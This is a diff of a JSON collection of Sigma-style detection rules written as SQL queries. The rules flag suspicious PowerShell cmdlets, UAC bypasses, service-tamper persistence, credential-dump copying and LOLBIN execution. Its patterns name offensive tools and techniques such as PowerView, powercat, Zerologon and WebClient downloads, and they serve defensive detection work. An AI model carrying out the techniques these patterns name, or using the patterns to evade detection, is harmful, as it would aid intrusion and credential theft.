Payload LIKE '%Invoke-StandIn%' ESCAPE '\\' OR Payload LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR Payload LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tater%' ESCAPE '\\' OR Payload LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR Payload LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR Payload LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR Payload LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR Payload LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR Payload LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR Payload LIKE '%Invoke-Whisker%' ESCAPE '\\' OR Payload LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR Payload LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR Payload LIKE '%Invoke-WireTap%' ESCAPE '\\' OR Payload LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR Payload LIKE '%MailRaider%' ESCAPE '\\' OR Payload LIKE '%New-HoneyHash%' ESCAPE '\\' OR Payload LIKE '%New-InMemoryModule%' ESCAPE '\\' OR Payload LIKE '%Out-Minidump%' ESCAPE '\\' OR Payload LIKE '%Port-Scan%' ESCAPE '\\' OR Payload LIKE '%PowerBreach%' ESCAPE '\\' OR Payload LIKE '%powercat %' ESCAPE '\\' OR Payload LIKE '%PowerUp%' ESCAPE '\\' OR Payload LIKE '%PowerView%' ESCAPE '\\' OR Payload LIKE '%Remove-Update%' ESCAPE '\\' OR Payload LIKE '%Set-MacAttribute%' ESCAPE '\\' OR Payload LIKE '%Set-Wallpaper%' ESCAPE '\\' OR Payload LIKE '%Show-TargetScreen%' ESCAPE '\\' OR Payload LIKE '%Start-CaptureServer%' ESCAPE '\\' OR Payload LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR Payload LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'HH.exe' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (CommandLine LIKE '%.application%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Content.Outlook\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "posh_pm_malicious_commandlets.yml" + "filename": "proc_creation_win_hh_susp_execution.yml" }, { - "title": "AD Groups Or Users Enumeration Using PowerShell - PoshModule", - "id": "815bfc17-7fc6-4908-a55e-2f37b98cedb4", - "status": "test", - "description": "Adversaries may attempt to find domain-level groups and permission settings.\nThe knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as domain administrators.\n", - "author": "frack113", + "title": "PUA - Potential PE Metadata Tamper Using Rcedit", + "id": "0c92f2e6-f08f-4b73-9216-ecb0ca634689", + "status": "experimental", + "description": "Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion.", + "author": "Micah Babinski", "tags": [ - "attack.discovery", - "attack.t1069.001" + "attack.defense_evasion", + "attack.t1036.003", + "attack.t1036", + "attack.t1027.005", + "attack.t1027" ], "falsepositives": [ - "Administrator script" + "Legitimate use of the tool by administrators or users to update metadata of a binary" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (Payload LIKE '%get-ADPrincipalGroupMembership%' ESCAPE '\\' OR ContextInfo LIKE '%get-ADPrincipalGroupMembership%' ESCAPE '\\' OR (Payload LIKE '%get-aduser%' ESCAPE '\\' AND Payload LIKE '%-f %' ESCAPE '\\' AND Payload LIKE '%-pr %' ESCAPE '\\' AND Payload LIKE '%DoesNotRequirePreAuth%' ESCAPE '\\') OR (ContextInfo LIKE '%get-aduser%' ESCAPE '\\' AND ContextInfo LIKE '%-f %' ESCAPE '\\' AND ContextInfo LIKE '%-pr %' ESCAPE '\\' AND ContextInfo LIKE '%DoesNotRequirePreAuth%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rcedit-x64.exe' ESCAPE '\\' OR Image LIKE '%\\\\rcedit-x86.exe' ESCAPE '\\') OR Description = 'Edit resources of exe' OR Product = 'rcedit') AND CommandLine LIKE '%--set-%' ESCAPE '\\' AND (CommandLine LIKE '%OriginalFileName%' ESCAPE '\\' OR CommandLine LIKE '%CompanyName%' ESCAPE '\\' OR CommandLine LIKE '%FileDescription%' ESCAPE '\\' OR CommandLine LIKE '%ProductName%' ESCAPE '\\' OR CommandLine LIKE '%ProductVersion%' ESCAPE '\\' OR CommandLine LIKE '%LegalCopyright%' ESCAPE '\\'))" ], - "filename": "posh_pm_susp_ad_group_reco.yml" + "filename": "proc_creation_win_pua_rcedit_execution.yml" }, { - "title": "Bad Opsec Powershell Code Artifacts", - "id": "8d31a8ce-46b5-4dd6-bdc3-680931f1db86", - "status": "test", - "description": "focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including\nCobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads \nthat often undergo minimal changes by attackers due to bad opsec.\n", - "author": "ok @securonix invrep_de, oscd.community", + "title": "HackTool - Jlaive In-Memory Assembly Execution", + "id": "0a99eb3e-1617-41bd-b095-13dc767f3def", + "status": "experimental", + "description": "Detects the use of Jlaive to execute assemblies in a copied PowerShell", + "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1059.003" ], "falsepositives": [ - "Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments." + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%$DoIt%' ESCAPE '\\' OR Payload LIKE '%harmj0y%' ESCAPE '\\' OR Payload LIKE '%mattifestation%' ESCAPE '\\' OR Payload LIKE '%\\_RastaMouse%' ESCAPE '\\' OR Payload LIKE '%tifkin\\_%' ESCAPE '\\' OR Payload LIKE '%0xdeadbeef%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%.bat' ESCAPE '\\') AND ((Image LIKE '%\\\\xcopy.exe' ESCAPE '\\' AND CommandLine LIKE '%powershell.exe%' ESCAPE '\\' AND CommandLine LIKE '%.bat.exe%' ESCAPE '\\') OR (Image LIKE '%\\\\xcopy.exe' ESCAPE '\\' AND CommandLine LIKE '%pwsh.exe%' ESCAPE '\\' AND CommandLine LIKE '%.bat.exe%' ESCAPE '\\') OR (Image LIKE '%\\\\attrib.exe' ESCAPE '\\' AND CommandLine LIKE '%+s%' ESCAPE '\\' AND CommandLine LIKE '%+h%' ESCAPE '\\' AND CommandLine LIKE '%.bat.exe%' ESCAPE '\\')))" ], - "filename": "posh_pm_bad_opsec_artifacts.yml" + "filename": "proc_creation_win_hktl_jlaive_batch_execution.yml" }, { - "title": "PowerShell Decompress Commands", - "id": "1ddc1472-8e52-4f7d-9f11-eab14fc171f5", - "status": "test", - "description": "A General detection for specific decompress commands in PowerShell logs. This could be an adversary decompressing files.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Suspicious Msiexec Execute Arbitrary DLL", + "id": "6f4191bb-912b-48a8-9ce7-682769541e6d", + "status": "experimental", + "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1140" + "attack.t1218.007" ], "falsepositives": [ - "Unknown" + "Legitimate script" ], - "level": "informational", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Expand-Archive%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND (CommandLine LIKE '% /y%' ESCAPE '\\' OR CommandLine LIKE '% -y%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files (x86)\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\ScriptingObjectModel.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\SoftwareUpdateAdmin.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files (x86)\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\ScriptingObjectModel.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\SoftwareUpdateAdmin.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\'))))" ], - "filename": "posh_pm_decompress_commands.yml" + "filename": "proc_creation_win_msiexec_execute_dll.yml" }, { - "title": "Remote PowerShell Session (PS Module)", - "id": "96b9f619-aa91-478f-bacb-c3e50f8df575", + "title": "UAC Bypass Using IEInstal - Process", + "id": "80fc36aa-945e-4181-89f2-2f907ab6775d", "status": "test", - "description": "Detects remote PowerShell sessions", - "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate use remote PowerShell sessions" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ContextInfo LIKE '% = ServerRemoteHost %' ESCAPE '\\' AND ContextInfo LIKE '%wsmprovhost.exe%' ESCAPE '\\') AND NOT ((ContextInfo LIKE '%\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\Modules\\\\Microsoft.PowerShell.Archive\\\\Microsoft.PowerShell.Archive.psm1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel IN ('High', 'System') AND ParentImage LIKE '%\\\\ieinstal.exe' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE '%consent.exe' ESCAPE '\\')" ], - "filename": "posh_pm_remote_powershell_session.yml" + "filename": "proc_creation_win_uac_bypass_ieinstal.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell Module", - "id": "a136cde0-61ad-4a61-9b82-8dc490e60dd2", - "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "Potential Persistence Attempt Via Existing Service Tampering", + "id": "38879043-7e1e-47a9-8d46-6bec88e201df", + "status": "test", + "description": "Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence.", + "author": "Sreeman", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1543.003", + "attack.t1574.011" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((CommandLine LIKE '%sc %' ESCAPE '\\' AND CommandLine LIKE '%config %' ESCAPE '\\' AND CommandLine LIKE '%binpath=%' ESCAPE '\\') OR (CommandLine LIKE '%sc %' ESCAPE '\\' AND CommandLine LIKE '%failure%' ESCAPE '\\' AND CommandLine LIKE '%command=%' ESCAPE '\\')) OR (((CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%FailureCommand%' ESCAPE '\\') OR (CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%ImagePath%' ESCAPE '\\')) AND (CommandLine LIKE '%.sh%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bin$%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.msh$%' ESCAPE '\\' OR CommandLine LIKE '%.reg$%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.jar%' ESCAPE '\\' OR CommandLine LIKE '%.pl%' ESCAPE '\\'))))" ], - "filename": "posh_pm_invoke_obfuscation_clip.yml" + "filename": "proc_creation_win_sc_service_tamper_for_persistence.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module", - "id": "f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6", + "title": "Nltest.EXE Execution", + "id": "903076ff-f442-475a-b667-4f246bcc203b", "status": "experimental", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects nltest commands that can be used for information discovery", + "author": "Arun Chauhan", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.discovery", + "attack.t1016", + "attack.t1018", + "attack.t1482" ], "falsepositives": [ - "Unknown" + "Legitimate administration activity" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR OriginalFileName = 'nltestrk.exe'))" ], - "filename": "posh_pm_invoke_obfuscation_via_var.yml" + "filename": "proc_creation_win_nltest_execution.yml" }, { - "title": "Suspicious PowerShell Download - PoshModule", - "id": "de41232e-12e8-49fa-86bc-c05c7e722df9", + "title": "Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE", + "id": "044ba588-dff4-4918-9808-3f95e8160606", "status": "experimental", - "description": "Detects suspicious PowerShell download command", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of the copy builtin cmd command to copy files with the \".dmp\"/\".dump\" extension from a remote share", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access" ], "falsepositives": [ - "PowerShell scripts that download content from the Internet" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%System.Net.WebClient%' ESCAPE '\\' AND (ContextInfo LIKE '%.DownloadFile(%' ESCAPE '\\' OR ContextInfo LIKE '%.DownloadString(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\')))" ], - "filename": "posh_pm_susp_download.yml" + "filename": "proc_creation_win_cmd_copy_dmp_from_share.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - PowerShell Module", - "id": "c72aca44-8d52-45ad-8f81-f96c4d3c755e", - "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "HackTool - Default PowerSploit/Empire Scheduled Task Creation", + "id": "56c217c3-2de2-479b-990f-5c109ba8458f", + "status": "test", + "description": "Detects the creation of a schtask via PowerSploit or Empire Default Configuration.", + "author": "Markus Neis, @Karneades", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", + "attack.persistence", + "attack.privilege_escalation", + "attack.s0111", + "attack.g0022", + "attack.g0060", + "car.2013-08-001", + "attack.t1053.005", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$?\\{?input).*&&.*\"')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%powershell.exe -NonI%' ESCAPE '\\' AND CommandLine LIKE '%/TN Updater /TR%' ESCAPE '\\' AND (CommandLine LIKE '%/SC ONLOGON%' ESCAPE '\\' OR CommandLine LIKE '%/SC DAILY /ST%' ESCAPE '\\' OR CommandLine LIKE '%/SC ONIDLE%' ESCAPE '\\' OR CommandLine LIKE '%/SC HOURLY%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_stdin.yml" + "filename": "proc_creation_win_hktl_powersploit_empire_default_schtasks.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell Module", - "id": "88a22f69-62f9-4b8a-aa00-6b0212f2f05a", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS", + "id": "07aa184a-870d-413d-893a-157f317f6f58", + "status": "test", + "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". Which can be used to gather information about the target machine", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", + "attack.discovery", "attack.execution", - "attack.t1059.001" + "attack.t1615", + "attack.t1059.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%rundll32%' ESCAPE '\\' AND Payload LIKE '%shell32.dll%' ESCAPE '\\' AND Payload LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (Payload LIKE '%value%' ESCAPE '\\' OR Payload LIKE '%invoke%' ESCAPE '\\' OR Payload LIKE '%comspec%' ESCAPE '\\' OR Payload LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%gatherNetworkInfo.vbs%' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\')))" ], - "filename": "posh_pm_invoke_obfuscation_via_use_rundll32.yml" + "filename": "proc_creation_win_susp_gather_network_info_execution.yml" }, { - "title": "Alternate PowerShell Hosts - PowerShell Module", - "id": "64e8e417-c19a-475a-8d19-98ea705394cc", - "status": "test", - "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Use of Forfiles For Execution", + "id": "9aa5106d-bce3-4b13-86df-3a20f1d5cf0b", + "status": "experimental", + "description": "Execute commands and binaries from the context of \"forfiles\". This is used as a LOLBIN for example to bypass application whitelisting.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1059" ], "falsepositives": [ - "Programs using PowerShell directly without invocation of a dedicated interpreter", - "MSP Detection Searcher", - "Citrix ConfigSync.ps1" + "Legitimate use via a batch script or by an administrator." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ContextInfo LIKE '%' ESCAPE '\\' AND NOT (((ContextInfo LIKE '%= powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:/Windows/System32/WindowsPowerShell/v1.0/powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell%' ESCAPE '\\')) OR (ContextInfo LIKE '%= C:\\\\WINDOWS\\\\System32\\\\sdiagnhost.exe -Embedding%' ESCAPE '\\') OR (ContextInfo LIKE '%ConfigSyncRun.exe%' ESCAPE '\\') OR (ContextInfo LIKE '%C:\\\\Windows\\\\system32\\\\dsac.exe%' ESCAPE '\\') OR (ContextInfo LIKE '%C:\\\\Windows\\\\system32\\\\wsmprovhost.exe -Embedding%' ESCAPE '\\') OR ((Payload LIKE '%Update-Help%' ESCAPE '\\' OR Payload LIKE '%Failed to update Help for the module%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR OriginalFileName = 'forfiles.exe') AND (CommandLine LIKE '% /p %' ESCAPE '\\' OR CommandLine LIKE '% -p %' ESCAPE '\\') AND (CommandLine LIKE '% /m %' ESCAPE '\\' OR CommandLine LIKE '% -m %' ESCAPE '\\') AND (CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\'))" ], - "filename": "posh_pm_alternate_powershell_hosts.yml" + "filename": "proc_creation_win_lolbin_forfiles.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module", - "id": "2f211361-7dce-442d-b78a-c04039677378", - "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "title": "Automated Collection Command Prompt", + "id": "f576a613-2392-4067-9d1a-9345fb58d8d1", + "status": "test", + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.collection", + "attack.t1119", + "attack.credential_access", + "attack.t1552.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (Payload REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR Payload REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR Payload REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR Payload REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR Payload REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR Payload REGEXP '\\$VerbosePreference\\.ToString\\(' OR Payload REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%.doc%' ESCAPE '\\' OR CommandLine LIKE '%.docx%' ESCAPE '\\' OR CommandLine LIKE '%.xls%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx%' ESCAPE '\\' OR CommandLine LIKE '%.ppt%' ESCAPE '\\' OR CommandLine LIKE '%.pptx%' ESCAPE '\\' OR CommandLine LIKE '%.rtf%' ESCAPE '\\' OR CommandLine LIKE '%.pdf%' ESCAPE '\\' OR CommandLine LIKE '%.txt%' ESCAPE '\\') AND ((CommandLine LIKE '%dir %' ESCAPE '\\' AND CommandLine LIKE '% /b %' ESCAPE '\\' AND CommandLine LIKE '% /s %' ESCAPE '\\') OR (OriginalFileName = 'FINDSTR.EXE' AND (CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /si %' ESCAPE '\\'))))" ], - "filename": "posh_pm_invoke_obfuscation_obfuscated_iex.yml" + "filename": "proc_creation_win_susp_automated_collection.yml" }, { - "title": "Suspicious Get Information for SMB Share - PowerShell Module", - "id": "6942bd25-5970-40ab-af49-944247103358", + "title": "Perl Inline Command Execution", + "id": "f426547a-e0f7-441a-b63e-854ac5bdf54d", "status": "experimental", - "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and\nto identify potential systems of interest for Lateral Movement.\nNetworks often contain shared network drives and folders that enable users to access file directories on various systems across a network.\n", - "author": "frack113", + "description": "Detects execution of perl using the \"-e\"/\"-E\" flags. This is could be used as a way to launch a reverse shell or execute live perl code.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1069.001" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Administrator script" + "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (Payload LIKE '%get-smbshare%' ESCAPE '\\' OR ContextInfo LIKE '%get-smbshare%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\perl.exe' ESCAPE '\\' OR OriginalFileName = 'perl.exe') AND CommandLine LIKE '% -e%' ESCAPE '\\')" ], - "filename": "posh_pm_susp_smb_share_reco.yml" + "filename": "proc_creation_win_perl_inline_command_execution.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - PowerShell Module", - "id": "9ac8b09b-45de-4a07-9da1-0de8c09304a3", - "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "PUA - DIT Snapshot Viewer", + "id": "d3b70aad-097e-409c-9df2-450f80dc476b", + "status": "test", + "description": "Detects the use of Ditsnap tool, an inspection tool for Active 